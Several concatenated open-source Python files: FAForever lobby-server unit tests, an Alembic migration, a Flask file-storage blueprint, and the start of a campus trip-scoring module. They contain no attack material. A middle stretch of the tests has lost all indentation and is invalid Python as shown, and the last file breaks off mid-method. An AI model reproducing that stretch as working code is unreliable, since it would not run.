    lobbyconnection.send.assert_called_with(expected_reply)
async def test_command_game_join_without_password(
    lobbyconnection,
    database,
    game_service,
    test_game_info,
    players,
    game_stats_service
):
    """Joining a passworded game without a password yields an info notice."""
    lobbyconnection.send = mock.AsyncMock()
    lobbyconnection.game_service = game_service
    game = mock.create_autospec(Game)
    game.state = GameState.LOBBY
    game.init_mode = InitMode.NORMAL_LOBBY
    game.password = "password"
    game.game_mode = "faf"
    game.id = 42
    game.host = players.hosting
    game_service._games[42] = game
    lobbyconnection.player = players.joining
    players.joining.state = PlayerState.IDLE
    test_game_info["uid"] = 42
    del test_game_info["password"]
    await lobbyconnection.on_message_received({
        "command": "game_join",
        **test_game_info
    })
    lobbyconnection.send.assert_called_once_with({
        "command": "notice",
        "style": "info",
        "text": "Bad password (it's case sensitive)."
    })
async def test_command_game_join_game_not_found(
    lobbyconnection,
    game_service,
    test_game_info,
    players
):
    """Joining a nonexistent game id reports the host as gone."""
    lobbyconnection.send = mock.AsyncMock()
    lobbyconnection.game_service = game_service
    lobbyconnection.player = players.joining
    players.joining.state = PlayerState.IDLE
    test_game_info["uid"] = 42
    await lobbyconnection.on_message_received({
        "command": "game_join",
        **test_game_info
    })
    lobbyconnection.send.assert_called_once_with({
        "command": "notice",
        "style": "info",
        "text": "The host has left the game."
    })
async def test_command_game_join_game_bad_init_mode(
    lobbyconnection,
    game_service,
    test_game_info,
    players
):
    """Auto-lobby (matchmaker) games cannot be joined via game_join."""
    lobbyconnection.send = mock.AsyncMock()
    lobbyconnection.game_service = game_service
    game = mock.create_autospec(Game)
    game.state = GameState.LOBBY
    game.init_mode = InitMode.AUTO_LOBBY
    game.id = 42
    game.host = players.hosting
    game_service._games[42] = game
    lobbyconnection.player = players.joining
    lobbyconnection.player.state = PlayerState.IDLE
    test_game_info["uid"] = 42
    await lobbyconnection.on_message_received({
        "command": "game_join",
        **test_game_info
    })
    lobbyconnection.send.assert_called_once_with({
        "command": "notice",
        "style": "error",
        "text": "The game cannot be joined in this way."
    })
async def test_command_game_host_calls_host_game_invalid_title(
    lobbyconnection, mock_games, test_game_info_invalid
):
    """A non-ASCII title is rejected before any game is created."""
    lobbyconnection.send = mock.AsyncMock()
    mock_games.create_game = mock.Mock()
    await lobbyconnection.on_message_received({
        "command": "game_host",
        **test_game_info_invalid
    })
    assert mock_games.create_game.mock_calls == []
    lobbyconnection.send.assert_called_once_with(
        dict(command="notice", style="error", text="Title must contain only ascii characters."))
async def test_abort(mocker, lobbyconnection):
    """abort() closes the underlying protocol."""
    lobbyconnection.protocol.close = mock.AsyncMock()
    await lobbyconnection.abort()
    lobbyconnection.protocol.close.assert_any_call()
async def test_send_game_list(mocker, database, lobbyconnection, game_stats_service):
    """send_game_list sends every open game's dict form in one message."""
    games = mocker.patch.object(lobbyconnection, "game_service")  # type: GameService
    game1, game2 = mock.create_autospec(Game(42, database, mock.Mock(), game_stats_service)), \
        mock.create_autospec(Game(22, database, mock.Mock(), game_stats_service))
    games.open_games = [game1, game2]
    lobbyconnection.send = mock.AsyncMock()
    await lobbyconnection.send_game_list()
    lobbyconnection.send.assert_any_call({
        "command": "game_info",
        "games": [game1.to_dict(), game2.to_dict()]
    })
async def test_coop_list(mocker, lobbyconnection):
    """coop_list emits one coop_info message per mission in the test db."""
    await lobbyconnection.command_coop_list({})
    args = lobbyconnection.protocol.write_message.call_args_list
    assert len(args) == 5
    coop_maps = [arg[0][0] for arg in args]
    # uids are auto-generated, so strip them before comparing.
    for info in coop_maps:
        del info["uid"]
    assert coop_maps == [
        {
            "command": "coop_info",
            "name": "FA Campaign map",
            "description": "A map from the FA campaign",
            "filename": "maps/scmp_coop_123.v0002.zip",
            "featured_mod": "coop",
            "type": "FA Campaign"
        },
        {
            "command": "coop_info",
            "name": "Aeon Campaign map",
            "description": "A map from the Aeon campaign",
            "filename": "maps/scmp_coop_124.v0000.zip",
            "featured_mod": "coop",
            "type": "Aeon Vanilla Campaign"
        },
        {
            "command": "coop_info",
            "name": "Cybran Campaign map",
            "description": "A map from the Cybran campaign",
            "filename": "maps/scmp_coop_125.v0001.zip",
            "featured_mod": "coop",
            "type": "Cybran Vanilla Campaign"
        },
        {
            "command": "coop_info",
            "name": "UEF Campaign map",
            "description": "A map from the UEF campaign",
            "filename": "maps/scmp_coop_126.v0099.zip",
            "featured_mod": "coop",
            "type": "UEF Vanilla Campaign"
        },
        {
            "command": "coop_info",
            "name": "Prothyon - 16",
            "description": "Prothyon - 16 is a secret UEF facility...",
            "filename": "maps/prothyon16.v0005.zip",
            "featured_mod": "coop",
            "type": "Custom Missions"
        }
    ]
async def test_command_admin_closelobby(mocker, lobbyconnection, player_factory):
    """admin closelobby kicks the targeted player's lobby connection."""
    player = lobbyconnection.player
    player.id = 1
    tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
    data = {
        player.id: player,
        tuna.id: tuna
    }
    lobbyconnection.player_service.__getitem__.side_effect = data.__getitem__
    await lobbyconnection.on_message_received({
        "command": "admin",
        "action": "closelobby",
        "user_id": 55
    })
    tuna.lobby_connection.kick.assert_any_call()
async def test_command_admin_closeFA(lobbyconnection, player_factory):
    """admin closeFA sends the 'kill' notice to the target's client."""
    player = lobbyconnection.player
    player.id = 1
    tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
    data = {
        player.id: player,
        tuna.id: tuna
    }
    lobbyconnection.player_service.__getitem__.side_effect = data.__getitem__
    await lobbyconnection.on_message_received({
        "command": "admin",
        "action": "closeFA",
        "user_id": tuna.id
    })
    tuna.lobby_connection.write.assert_any_call({
        "command": "notice",
        "style": "kill",
    })
async def test_game_subscription(lobbyconnection: LobbyConnection):
    """Messages targeted at 'game' are forwarded to the game connection."""
    game = mock.Mock()
    game.handle_action = mock.AsyncMock()
    lobbyconnection.game_connection = game
    await lobbyconnection.on_message_received({
        "command": "test",
        "args": ["foo", 42],
        "target": "game"
    })
    game.handle_action.assert_called_with("test", ["foo", 42])
async def test_command_avatar_list(mocker, lobbyconnection: LobbyConnection):
    """avatar list_avatar returns the avatars owned by the player (Dostya)."""
    lobbyconnection.send = mock.AsyncMock()
    lobbyconnection.player.id = 2  # Dostya test user
    await lobbyconnection.on_message_received({
        "command": "avatar",
        "action": "list_avatar"
    })
    lobbyconnection.send.assert_any_call({
        "command": "avatar",
        "avatarlist": [{"url": "https://content.faforever.com/faf/avatars/qai2.png", "tooltip": "QAI"}, {"url": "https://content.faforever.com/faf/avatars/UEF.png", "tooltip": "UEF"}]
    })
async def test_command_avatar_select(mocker, database, lobbyconnection: LobbyConnection):
    """avatar select persists the selection flag in the database."""
    lobbyconnection.player.id = 2  # Dostya test user
    await lobbyconnection.on_message_received({
        "command": "avatar",
        "action": "select",
        "avatar": "https://content.faforever.com/faf/avatars/qai2.png"
    })
    async with database.acquire() as conn:
        result = await conn.execute("SELECT selected from avatars where idUser=2")
        row = result.fetchone()
        assert row.selected == 1
async def get_friends(player_id, database):
    """Return the ids of every player the given player has marked as a friend."""
    query = select(friends_and_foes.c.subject_id).where(
        and_(
            friends_and_foes.c.user_id == player_id,
            friends_and_foes.c.status == "FRIEND"
        )
    )
    async with database.acquire() as conn:
        rows = await conn.execute(query)
        return [row.subject_id for row in rows]
async def test_command_social_add_friend(lobbyconnection, database):
    """social_add persists the friend row and updates the in-memory set."""
    lobbyconnection.player.id = 1
    friends = await get_friends(lobbyconnection.player.id, database)
    assert friends == []
    assert lobbyconnection.player.friends == set()
    await lobbyconnection.on_message_received({
        "command": "social_add",
        "friend": 2
    })
    friends = await get_friends(lobbyconnection.player.id, database)
    assert friends == [2]
    assert lobbyconnection.player.friends == {2}
async def test_command_social_remove_friend(lobbyconnection, database):
    """social_remove deletes the friend row; removing twice is a no-op."""
    lobbyconnection.player.id = 2
    friends = await get_friends(lobbyconnection.player.id, database)
    assert friends == [1]
    lobbyconnection.player.friends = {1}
    await lobbyconnection.on_message_received({
        "command": "social_remove",
        "friend": 1
    })
    friends = await get_friends(lobbyconnection.player.id, database)
    assert friends == []
    assert lobbyconnection.player.friends == set()
    # Removing twice does nothing
    await lobbyconnection.on_message_received({
        "command": "social_remove",
        "friend": 1
    })
    friends = await get_friends(lobbyconnection.player.id, database)
    assert friends == []
    assert lobbyconnection.player.friends == set()
async def test_command_ice_servers(
    lobbyconnection: LobbyConnection,
    mock_nts_client
):
    """ice_servers merges coturn and Twilio tokens into one reply."""
    lobbyconnection.send = mock.AsyncMock()
    lobbyconnection.coturn_generator.server_tokens = mock.Mock(
        return_value=["coturn_tokens"]
    )
    mock_nts_client.server_tokens.return_value = ["twilio_tokens"]
    await lobbyconnection.on_message_received({"command": "ice_servers"})
    mock_nts_client.server_tokens.assert_called_once()
    lobbyconnection.send.assert_called_once_with({
        "command": "ice_servers",
        "ice_servers": ["coturn_tokens", "twilio_tokens"],
        "ttl": config.TWILIO_TTL
    })
async def test_broadcast(lobbyconnection: LobbyConnection, player_factory):
    """admin broadcast warns every connected player."""
    player = lobbyconnection.player
    player.lobby_connection = lobbyconnection
    player.id = 1
    tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
    data = {
        player.id: player,
        tuna.id: tuna
    }
    lobbyconnection.player_service.__iter__.side_effect = data.values().__iter__
    lobbyconnection.write_warning = mock.Mock()
    await lobbyconnection.on_message_received({
        "command": "admin",
        "action": "broadcast",
        "message": "This is a test message"
    })
    player.lobby_connection.write_warning.assert_called_with("This is a test message")
    tuna.lobby_connection.write_warning.assert_called_with("This is a test message")
async def test_broadcast_during_disconnect(lobbyconnection: LobbyConnection, player_factory):
    """Broadcast must survive players whose connection object is gone."""
    player = lobbyconnection.player
    player.lobby_connection = lobbyconnection
    player.id = 1
    # To simulate when a player has been recently disconnected so that they
    # still appear in the player_service list, but their lobby_connection
    # object has already been destroyed
    tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
    data = {
        player.id: player,
        tuna.id: tuna
    }
    lobbyconnection.player_service.__iter__.side_effect = data.values().__iter__
    lobbyconnection.write_warning = mock.Mock()
    # This should not leak any exceptions
    await lobbyconnection.on_message_received({
        "command": "admin",
        "action": "broadcast",
        "message": "This is a test message"
    })
    player.lobby_connection.write_warning.assert_called_with("This is a test message")
async def test_broadcast_connection_error(lobbyconnection: LobbyConnection, player_factory):
player = lobbyconnection.player
player.lobby_connection = lobbyconnection
player.id = 1
tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
tuna.lobby_connection.write_warning.side_effect = DisconnectedError("Some error")
data = {
player.id: player,
tuna.id: tuna
}
lobbyconnection.player_service.__iter__.side_effect = data.values().__iter__
lobbyconnection.write_warning = mock.Mock()
# This should not leak any exceptions
await lobbyconnection.on_message_received({
"command": "admin",
"action": "broadcast",
"message": "This is a test message"
})
player.lobby_connection.write_warning.assert_called_with("This is a test message")
async def test_game_connection_not_restored_if_no_such_game_exists(lobbyconnection: LobbyConnection, mocker):
del lobbyconnection.player.game_connection
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.player.state = PlayerState.IDLE
await lobbyconnection.on_message_received({
"command": "restore_game_session",
"game_id": 123
})
assert not lobbyconnection.player.game_connection
assert lobbyconnection.player.state == PlayerState.IDLE
lobbyconnection.send.assert_any_call({
"command": "notice",
"style": "info",
"text": "The game you were connected to does no longer exist"
})
@pytest.mark.parametrize("game_state", [GameState.INITIALIZING, GameState.ENDED])
async def test_game_connection_not_restored_if_game_state_prohibits(
lobbyconnection: LobbyConnection,
game_service: GameService,
game_stats_service,
game_state,
mocker,
database
):
del lobbyconnection.player.game_connection
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.player.state = PlayerState.IDLE
lobbyconnection.game_service = game_service
game = mock.create_autospec(Game(42, database, game_service, game_stats_service))
game.state = game_state
game.password = None
game.game_mode = "faf"
game.id = 42
game_service._games[42] = game
await lobbyconnection.on_message_received({
"command": "restore_game_session",
"game_id": 42
})
assert not lobbyconnection.game_connection
assert lobbyconnection.player.state == PlayerState.IDLE
lobbyconnection.send.assert_any_call({
"command": "notice",
"style": "info",
"text": "The game you were connected to is no longer available"
})
@pytest.mark.parametrize("game_state", [GameState.LIVE, GameState.LOBBY])
async def test_game_connection_restored_if_game_exists(
lobbyconnection: LobbyConnection,
game_service: GameService,
game_stats_service,
game_state,
database
):
del lobbyconnection.player.game_connection
lobbyconnection.player.state = PlayerState.IDLE
lobbyconnection.game_service = game_service
game = mock.create_autospec(Game(42, database, game_service, game_stats_service))
game.state = game_state
game.password = None
game.game_mode = "faf"
game.id = 42
game_service._games[42] = game
await lobbyconnection.on_message_received({
"command": "restore_game_session",
"game_id": 42
})
assert lobbyconnection.game_connection
assert lobbyconnection.player.state is PlayerState.PLAYING
assert lobbyconnection.player.game is game
async def test_command_invite_to_party(lobbyconnection, mock_player):
lobbyconnection.player = mock_player
lobbyconnection.player.id = 2
lobbyconnection._authenticated = True
await lobbyconnection.on_message_received({
"command": "invite_to_party",
"recipient_id": 1
})
lobbyconnection.party_service.invite_player_to_party.assert_called_once()
async def test_command_accept_party_invite(lobbyconnection, mock_player):
lobbyconnection.player = mock_player
lobbyconnection.player.id = 2
lobbyconnection._authenticated = True
await lobbyconnection.on_message_received({
"command": "accept_party_invite",
"sender_id": 1
})
lobbyconnection.party_service.accept_invite.assert_called_once()
async def test_command_kick_player_from_party(lobbyconnection, mock_player):
lobbyconnection.player = mock_player
lobbyconnection.player.id = 2
lobbyconnection._authenticated = True
await lobbyconnection.on_message_received({
"command": "kick_player_from_party",
"kicked_player_id": 1
})
lobbyconnection.party_service.kick_player_from_party.assert_called_once()
async def test_command_leave_party(lobbyconnection, mock_player):
lobbyconnection.player = mock_player
lobbyconnection.player.id = 2
lobbyconnection._authenticated = True
await lobbyconnection.on_message_received({
"command": "leave_party"
})
lobbyconnection.party_service.leave_party.assert_called_once()
async def test_command_game_matchmaking(lobbyconnection):
lobbyconnection.player.id = 1
await lobbyconnection.on_message_received({
"command": "game_matchmaking",
"state": "stop"
})
lobbyconnection.ladder_service.cancel_search.assert_called_with(
lobbyconnection.player,
"ladder1v1"
)
async def test_command_game_matchmaking_not_party_owner(
lobbyconnection,
mock_player,
player_factory
):
party_owner = player_factory(player_id=2, lobby_connection_spec="auto")
party = PlayerParty(party_owner)
party.add_player(mock_player)
lobbyconnection.player.id = 1
lobbyconnection.party_service.get_party.return_value = party
await lobbyconnection.on_message_received({
"command": "game_matchmaking",
"state": "start",
"faction": "seraphim"
})
lobbyconnection.ladder_service.start_search.assert_not_called()
await lobbyconnection.on_message_received({
"command": "game_matchmaking",
"state": "stop"
})
lobbyconnection.ladder_service.cancel_search.assert_called_once()
async def test_command_match_ready(lobbyconnection):
await lobbyconnection.on_message_received({
"command": "match_ready"
})
async def test_command_matchmaker_info(
lobbyconnection,
ladder_service,
queue_factory,
player_factory,
mocker
):
queue = queue_factory("test", rating_type=RatingType.LADDER_1V1)
queue.timer.next_queue_pop = 1_562_000_000
queue.push(Search([
player_factory(player_id=1, ladder_rating=(2000, 100), ladder_games=200),
]))
queue.push(Search([
player_factory(player_id=2, ladder_rating=(500, 120), ladder_games=100),
player_factory(player_id=3, ladder_rating=(1500, 500), ladder_games=0),
]))
queue.push(Search([
player_factory(player_id=4, ladder_rating=(1000, 100), ladder_games=500),
player_factory(player_id=5, ladder_rating=(1300, 100), ladder_games=200),
player_factory(player_id=6, ladder_rating=(2000, 100), ladder_games=1000),
]))
mocker.patch(
"server.matchmaker.matchmaker_queue.time.time",
return_value=queue.timer.next_queue_pop - 1,
)
lobbyconnection.ladder_service.queues = {
"test": queue
}
lobbyconnection.send = mock.AsyncMock()
await lobbyconnection.on_message_received({
"command": "matchmaker_info"
})
lobbyconnection.send.assert_called_with({
"command": "matchmaker_info",
"queues": [
{
"queue_name": "test",
"queue_pop_time": "2019-07-01T16:53:20+00:00",
"queue_pop_time_delta": 1.0,
"team_size": 1,
"num_players": 6,
"boundary_80s": [(1800, 2200), (300, 700), (800, 1200)],
"boundary_75s": [(1900, 2100), (400, 600), (900, 1100)]
}
]
})
async def test_connection_lost(lobbyconnection):
lobbyconnection.game_connection = mock.create_autospec(GameConnection)
await lobbyconnection.on_connection_lost()
lobbyconnection.game_connection.on_connection_lost.assert_called_once()
async def test_connection_lost_send(lobbyconnection, mock_protocol):
await lobbyconnection.on_connection_lost()
await lobbyconnection.send({"command": "Some Message"})
mock_protocol.send_message.assert_not_called()
mock_protocol.send_messages.assert_not_called()
mock_protocol.send_raw.assert_not_called()
async def test_check_policy_conformity(lobbyconnection, policy_server):
    """An "honest" verdict from the policy server passes the check."""
    host, port = policy_server
    config.FAF_POLICY_SERVER_BASE_URL = f"http://{host}:{port}"
    honest = await lobbyconnection.check_policy_conformity(1, "honest", session=100)
    assert honest is True
async def test_check_policy_conformity_fraudulent(lobbyconnection, policy_server, database):
host, port = policy_server
config.FAF_POLICY_SERVER_BASE_URL = f"http://{host}:{port}"
# 42 is not a valid player ID which should cause a SQL constraint error
lobbyconnection.abort = mock.AsyncMock()
with pytest.raises(ClientError):
await lobbyconnection.check_policy_conformity(42, "fraudulent", session=100)
lobbyconnection.abort = mock.AsyncMock()
player_id = 200
honest = await lobbyconnection.check_policy_conformity(player_id, "fraudulent", session=100)
assert honest is False
lobbyconnection.abort.assert_called_once()
# Check that the user has a ban entry in the database
async with database.acquire() as conn:
result = await conn.execute(select(ban.c.reason).where(
ban.c.player_id == player_id
))
rows = result.fetchall()
assert rows is not None
assert rows[-1].reason == "Auto-banned because of fraudulent login attempt"
async def test_check_policy_conformity_fatal(lobbyconnection, policy_server):
host, port = policy_server
config.FAF_POLICY_SERVER_BASE_URL = f"http://{host}:{port}"
for result in ("already_associated", "fraudulent"):
lobbyconnection.abort = mock.AsyncMock()
honest = await lobbyconnection.check_policy_conformity(1, result, session=100)
assert honest is False
lobbyconnection.abort.assert_called_once()
async def test_abort_connection_if_banned(
    lobbyconnection: LobbyConnection,
    mock_nts_client
):
    """abort_connection_if_banned raises BanError only for active bans.

    Player ids exercise each case in turn: never banned, ban revoked,
    ban expired, permanent ban, and a ban with ~46 hours remaining.
    """
    # test user that has never been banned
    lobbyconnection.player.id = 1
    await lobbyconnection.abort_connection_if_banned()
    # test user whose ban has been revoked
    lobbyconnection.player.id = 201
    await lobbyconnection.abort_connection_if_banned()
    # test user whose ban has expired
    lobbyconnection.player.id = 202
    await lobbyconnection.abort_connection_if_banned()
    # test user who is permabanned
    lobbyconnection.player.id = 203
    with pytest.raises(BanError) as banned_error:
        await lobbyconnection.abort_connection_if_banned()
    assert banned_error.value.message() == \
        "You are banned from FAF forever. <br>Reason: <br>Test permanent ban"
    # test user who is banned for another 46 hours
    # (regex tolerates 21.x or 22.x hours to avoid timing flakiness)
    lobbyconnection.player.id = 204
    with pytest.raises(BanError) as banned_error:
        await lobbyconnection.abort_connection_if_banned()
    assert re.match(
        r"You are banned from FAF for 1 day and 2[12]\.[0-9]+ hours. <br>"
        "Reason: <br>Test ongoing ban with 46 hours left",
        banned_error.value.message()
    )
| FAForever/server | tests/unit_tests/test_lobbyconnection.py | test_lobbyconnection.py | py | 34,970 | python | en | code | 64 | github-code | 36 |
36117885682 | """
Revision ID: a93cd7e01a93
Revises: 6052d96d32f0
Create Date: 2020-06-28 16:58:12.857105
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a93cd7e01a93'
down_revision = '6052d96d32f0'
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``group_menu`` association table linking groups to menus."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('group_menu',
        sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
        sa.Column('group_id', sa.Integer(), nullable=True),
        sa.Column('group_key', sa.String(length=32), nullable=True),
        sa.Column('menu_id', sa.Integer(), nullable=True),
        sa.ForeignKeyConstraint(['group_id'], ['group.id'], ),
        sa.ForeignKeyConstraint(['menu_id'], ['menu.id'], ),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_group_menu_id'), 'group_menu', ['id'], unique=False)
    # ### end Alembic commands ###
def downgrade():
    """Drop the ``group_menu`` table and its index (reverse of upgrade)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_group_menu_id'), table_name='group_menu')
    op.drop_table('group_menu')
    # ### end Alembic commands ###
| lianjy357/vue-element-admin-fastapi | backend/app/alembic/versions/a93cd7e01a93_.py | a93cd7e01a93_.py | py | 1,142 | python | en | code | 14 | github-code | 36 |
from pathlib import Path

from flask import (
    Blueprint,
    flash,
    redirect,
    url_for,
    render_template,
    request,
    send_from_directory,
)

from filenavi import model
from .wrap import require_authentication
from .error import MalformedRequest, Unauthorized, NotAuthenticated, NotAccessible
INLINE_EXTENSIONS = ["txt", "pdf", "png", "jpg", "jpeg", "gif"]
bp = Blueprint("storage", __name__)
@bp.route("/<user:owner>/<visibility:visibility>/browse/")
@bp.route("/<user:owner>/<visibility:visibility>/browse/<path:path>")
def browse(owner, visibility, path=None):
    """Serve a directory listing, or download/display a single file.

    Private storage requires an authenticated user with access rights.
    Files with a whitelisted extension are served inline, everything
    else as an attachment; directories render the browse template.
    """
    user = model.User.current()
    home = owner.home(visibility)
    path = (home / path) if path is not None else home
    target = model.File(path, owner, visibility)

    if visibility == model.Visibility.PRIVATE:
        if user is None:
            raise NotAuthenticated
        if not user.has_access_to(target):
            raise Unauthorized

    if not path.is_dir():
        # Only whitelisted extensions are shown inline in the browser.
        as_attachment = True
        if any(str(target.path).lower().endswith(f".{e}") for e in INLINE_EXTENSIONS):
            as_attachment = False
        return send_from_directory(
            home, target.path.relative_to(home), as_attachment=as_attachment
        )

    if user is None or not user.has_access_to(target):
        raise Unauthorized

    # Canonicalize directory URLs so relative links resolve correctly.
    if not request.path.endswith("/"):
        return redirect(f"{request.url}/")

    files = []
    try:
        for f in path.iterdir():
            f = f.relative_to(home)
            files.append(model.File(f, owner, visibility))
    # BUG FIX: was a bare ``except:`` which also swallowed
    # KeyboardInterrupt/SystemExit; only filesystem and path errors
    # should map to NotAccessible.
    except (OSError, ValueError):
        raise NotAccessible

    parent = None
    if not home.samefile(path):
        parent = model.File(path.parent, owner, visibility)

    return render_template(
        "storage/browse.html",
        files=files,
        user=user,
        owner=owner,
        visibility=visibility,
        current=path.relative_to(home) if path != home else "",
        parent=parent,
    )
@bp.route("/<user:owner>/<visibility:visibility>/browse/", methods=["POST"])
@bp.route(
    "/<user:owner>/<visibility:visibility>/browse/<path:path>", methods=["POST"]
)
@require_authentication
def browse_handler(owner, visibility, path=None):
    """Handle uploads and directory creation inside *path*.

    The form may carry uploaded "files", a new "directory" name, or
    both; at least one must be present. Redirects back to the listing.
    """
    user = model.User.current()
    if "files" not in request.files and "directory" not in request.form:
        raise MalformedRequest
    home = owner.home(visibility)
    path = (home / path) if path is not None else home
    target = model.File(path, owner, visibility)
    if not user.has_access_to(target):
        raise Unauthorized
    if "files" in request.files:
        uploads = request.files.getlist("files")
        for upload in uploads:
            # An empty filename means the form was submitted without a file.
            if upload.filename == "":
                raise MalformedRequest
            upload.save(path / upload.filename)
    if "directory" in request.form:
        if request.form["directory"] == "":
            raise MalformedRequest
        directory = model.File(path / request.form["directory"], owner, visibility)
        directory.mkdir()
    return redirect(
        url_for(
            ".browse", visibility=visibility, path=path.relative_to(home), owner=owner
        )
    )
@bp.route("/<user:owner>/<visibility:visibility>/move/<path:path>")
@require_authentication
def move(owner, visibility, path=None):
    """Render the confirmation form for moving *path*."""
    user = model.User.current()
    home = owner.home(visibility)
    path = (home / path) if path is not None else home
    target = model.File(path, owner, visibility)
    if not user.has_access_to(target):
        raise Unauthorized
    return render_template(
        "storage/move.html",
        file=target,
        user=user,
        owner=owner,
        visibility=visibility,
    )
@bp.route(
    "/<user:owner>/<visibility:visibility>/move/<path:path>",
    methods=["POST"],
)
@require_authentication
def move_handler(owner, visibility, path=None):
    """Handle the move form: relocate *path* to the posted "move-path".

    Redirects back to the parent directory listing, flashing an error
    when the source is missing or the move fails.
    """
    user = model.User.current()
    home = owner.home(visibility)
    path = (home / path) if path is not None else home
    # `home / path` is a no-op here: `path` is already absolute, and
    # joining an absolute path replaces the left operand.
    target = model.File(home / path, owner, visibility)
    if not user.has_access_to(target):
        raise Unauthorized
    rv = redirect(
        url_for(
            ".browse",
            visibility=visibility,
            path=path.relative_to(home).parents[0],
            owner=owner,
        )
    )
    # BUG FIX: the guard used to test for a "path" form field while the
    # code below reads "move-path" -- a request missing the destination
    # slipped past the check and failed with a generic 400 instead of
    # MalformedRequest.
    if "move-path" not in request.form:
        raise MalformedRequest
    if not target.path.exists():
        flash("No such file or directory", "error")
        return rv
    try:
        force = "replace" in request.form
        target.move(home / request.form["move-path"], force=force)
    except ValueError:
        flash("Unable to move file", "error")
        return rv
    return rv
@bp.route("/<user:owner>/<visibility:visibility>/toggle/<path:path>")
@require_authentication
def toggle(owner, visibility, path=None):
    """Render the confirmation form for toggling *path*'s visibility."""
    user = model.User.current()
    home = owner.home(visibility)
    path = (home / path) if path is not None else home
    target = model.File(path, owner, visibility)
    if not user.has_access_to(target):
        raise Unauthorized
    return render_template(
        "storage/toggle.html",
        file=target,
        user=user,
        owner=owner,
        visibility=visibility,
    )
@bp.route(
    "/<user:owner>/<visibility:visibility>/toggle/<path:path>",
    methods=["POST"],
)
@require_authentication
def toggle_handler(owner, visibility, path=None):
    """Handle the visibility-toggle form for *path*.

    Moves the file between the owner's public and private trees via
    ``File.toggle`` and redirects back to the parent listing.
    """
    user = model.User.current()
    home = owner.home(visibility)
    path = (home / path) if path is not None else home
    # `home / path` is a no-op here because `path` is already absolute.
    target = model.File(home / path, owner, visibility)
    if not user.has_access_to(target):
        raise Unauthorized
    rv = redirect(
        url_for(
            ".browse",
            visibility=visibility,
            path=path.relative_to(home).parents[0],
            owner=owner,
        )
    )
    if "path" not in request.form:
        raise MalformedRequest
    try:
        force = "replace" in request.form
        # Path is imported at module level now (resolves the old inline
        # "TODO: Do not require a Path object" import).
        target.toggle(Path(request.form["path"]), force=force)
    except ValueError:
        flash("Cannot toggle visibility", "error")
        return rv
    return rv
@bp.route("/<user:owner>/<visibility:visibility>/remove/<path:path>")
@require_authentication
def remove(owner, visibility, path=None):
    """Render the confirmation form for deleting *path*."""
    user = model.User.current()
    home = owner.home(visibility)
    path = (home / path) if path is not None else home
    target = model.File(path, owner, visibility)
    if not user.has_access_to(target):
        raise Unauthorized
    return render_template(
        "storage/remove.html",
        file=target,
        user=user,
        owner=owner,
        visibility=visibility,
    )
@bp.route(
    "/<user:owner>/<visibility:visibility>/remove/<path:path>",
    methods=["POST"],
)
@require_authentication
def remove_handler(owner, visibility, path=None):
    """Handle the delete form: remove *path*, optionally recursively.

    Redirects back to the parent directory listing either way, flashing
    an error message when the removal fails.
    """
    user = model.User.current()
    home = owner.home(visibility)
    path = (home / path) if path is not None else home
    # `home / path` is a no-op here because `path` is already absolute.
    target = model.File(home / path, owner, visibility)
    if not user.has_access_to(target):
        raise Unauthorized
    rv = redirect(
        url_for(
            ".browse",
            visibility=visibility,
            path=path.relative_to(home).parents[0],
            owner=owner,
        )
    )
    # "recursive" checkbox allows deleting non-empty directories.
    recursive = "recursive" in request.form
    try:
        target.remove(recursive=recursive)
    except ValueError:
        flash("No such file or directory", "error")
        return rv
    except OSError:
        flash("Cannot remove file or directory", "error")
        return rv
    return rv
| lukaswrz/filenavi | filenavi/routing/storage.py | storage.py | py | 7,605 | python | en | code | 0 | github-code | 36 |
15826968262 | from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from builtins import *
from past.utils import old_div
from builtins import object
import pykov as pk
import emission.net.ext_service.otp.otp as otp
import emission.net.ext_service.geocoder.nominatim as geo
import emission.core.wrapper.trip_old as to
import emission.core.get_database as edb
import datetime
import random
import math
import urllib.request, urllib.error, urllib.parse
import json
import heapq
import time
import requests
import random
import os
CENTER_OF_CAMPUS = to.Coordinate(37.871790, -122.260005)
RANDOM_RADIUS = .3 # 300 meters around center of campus; for randomization
N_TOP_TRIPS = 3 # Number of top trips we return for the user to look at
class UserBase(object):
    """
    Stores all the users and stores the population of areas
    Also keeps state on other useful things that we need to know, like caches
    """

    def __init__(self):
        self.users = []          # every UserModel that registered itself
        self.crowd_areas = {}    # area name -> Area, used for crowd scoring
        self.last_info = {}      # memo of last (start, end, utilities) query
        self.old_trips = None    # set but never read here -- TODO confirm use
        self.geocode_cache = {}  # place string -> geocoded coordinate

    def add_user(self, user):
        """Register a UserModel with this base."""
        self.users.append(user)

    def add_crowd(self, area):
        """Register an Area for crowd tracking, keyed by its name."""
        self.crowd_areas[area.name] = area

    def get_crowd_info(self, area_name):
        """Return the Area previously registered under *area_name*."""
        return self.crowd_areas[area_name]

    def geocode_with_cache(self, place):
        """Geocode *place*, caching results to avoid repeat lookups."""
        coder = geo.Geocoder()
        if place in self.geocode_cache:
            print(self.geocode_cache[place])
            return self.geocode_cache[place]
        else:
            coded = coder.geocode(place)
            self.geocode_cache[place] = coded
            print(coded)
            return coded
the_base = UserBase()
class CampusTrip(object):
    """A scored candidate trip across campus.

    Holds the four per-criterion scores (time, sweat, beauty, social),
    their sum, the duration in minutes, and the route points.
    """

    def __init__(self, score_list, time_duration, points, source):
        """score_list is (time, sweat, beauty, social); time_duration in seconds."""
        self.time = score_list[0]
        self.sweat = score_list[1]
        self.beauty = score_list[2]
        self.social = score_list[3]
        self.tot_score = sum(score_list)
        # Plain true division; the legacy ``old_div`` shim was redundant
        # because the module already does ``from __future__ import division``.
        self.time_duration = time_duration / 60.0
        self.points = points
        self.source = source

    def make_points(self):
